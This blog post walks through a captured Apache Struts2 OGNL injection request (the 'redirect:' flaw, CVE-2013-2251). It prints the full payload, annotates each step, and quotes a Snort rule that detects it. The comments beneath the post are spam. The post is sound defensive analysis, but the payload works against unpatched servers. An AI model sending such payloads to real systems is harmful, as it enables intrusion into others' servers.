Thursday, March 26, 2015

Apache Struts2 Remote Code Execution Walkthrough

I recently posted notes on an Apache Struts2 Remote Code Execution attempt

Here's the guts of the attack.
GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()} But what is it doing? Let's walk through it in a bit more detail.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.

Back in 2013 Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

In this example we see the vulnerable 'redirect' method being used.

GET /How.do?redirect:

Request to Java Servlet on Apache Tomcat server that is hopefully running an old version that is vulnerable to the redirect method code execution issue

${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),


Get this web request's Response so the attacker can tweak the settings on it

#res.setCharacterEncoding("UTF-8"),

Change the response to a character set that is readable like UTF-8

#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

Get this web request so the attacker can change was it does

#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}


Change this request so that instead of redirecting, it prints the absolute path on disk where the apache tomcat server is hosting the web files

Summary: This attack is not actually doing anything except validating if they've found a vulnerable victim server. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (like an absolute path on disk where tomcat is running) then the bot will immediately send another more malicious attack that drops a persistent payload on to compromise the server.

Keep your software versions up-to-date.

FYI - This is the snort rule that captures this attempt
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

3 comments:

  1. Replies
    1. Great Article IoT Projects for Students

      Deep Learning Projects for Final Year

      JavaScript Training in Chennai

      JavaScript Training in Chennai

      The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

      Delete